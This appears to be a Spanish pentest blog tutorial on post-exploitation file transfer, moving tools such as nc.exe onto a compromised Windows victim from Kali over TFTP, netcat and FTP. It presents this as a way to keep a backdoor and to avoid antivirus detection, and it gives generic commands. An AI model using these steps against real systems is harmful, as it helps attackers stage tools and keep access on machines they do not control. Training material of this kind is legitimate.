La post-explotación se basa en dos cosas principalmente, el mantenimiento del acceso y la escalación de privilegios. A lo largo de éste post veremos la forma en la cual la transferencia de archivos nos es de utilidad para mantener una puerta trasera en el target.
La transferencia de archivos es la manera tanto para traernos información desde el equipo comprometido como para subirle archivos de utilidad para mantener el acceso, descubrir nuevos equipos, pivotear e instalar backdoors.
Métodos de file transfer
Los antivirus generalmente identifican código maliciosos por dos caminos, uno es el basado en firmas y el otro es por análisis de comportamiento. Es por ésto que cuando queremos realizar una transferencia de archivos es conveniente utilizar software conocido y de confianza como por ejemplo nc, un cliente de ftp o mejor aún tftp.
TFTP
Es un protocolo de transferencia de archivos similar a FTP, las diferencias radican en que el primero no permite listar contenido ni cifrar la comunicación, va por UDP, no solicita ni requiere autenticación y corre por el puerto 69 mientras que el segundo lo hace por TCP, requiere de autenticación, corre sobre el puerto 21 y se puede cifrar la comunicación bajo ssl.
Una vez que ya hayamos obtenido el acceso podemos introducir o sacar archivos mediante el uso de tftp.
En nuestro Kali, debemos realizar algunas configuraciones.
1- Creamos un directorio llamado tftp.
mkdir /tftp
2- Inicializamos el demonio en el puerto 69.
atftpd –daemon –port 69 /tftp
Ahora podemos enviar archivos, probemos enviando nc.exe desde el kali
1- Localizamos el exe con locate.
2- Copiamos el binario a nuestro directorio /tftp.
3- Enviamos el archivo.
También podemos levantar la consola de tftp y ejecutar los comandos abreviados.
Netcat
Ya hemos enviado el nc, así que podríamos repetir un ejemplo que ya hemos realizado.
1- Desde el windows, inicializamos la escucha y le indicamos donde guardaremos el archivo transferido.
nc -nlvp nº.puerto > NombreDeArchivo
2- Desde el kali ejecutamos el mismo comando para establecer la conexión y le agregamos el archivo a enviar, que para este ejemplo será el wget. Primero lo localizamos:
Luego lo enviamos:
1
nc -nv ‘dirección-ip’ ‘nº de puerto’ < NombreDeArchivo
Recuerden la diferencia entre el que recibe > y el que envía <.
3- Corroborar si el archivo ha sido transferido exitosamente.
FTP
Por último veamos cómo transferir archivos por FTP. Para ésto primero necesitaremos descargarnos un ftp server en el kali, podemos elegir entre varias opciones como pure-ftpd, vsftpd entre otras. Todos son similares y se prestan muy bien para nuestro objetivo.
Una vez descargado e instalado, desde la shell que tenemos en la máquina víctima nos conectamos al dirección ip de nuestro kali como en los comandos
ftp Dirección IP o con ftp y luego open Dirección IP
Como siempre, cualquier duda o consulta, estamos por aquí.
Regards, @balderramaeric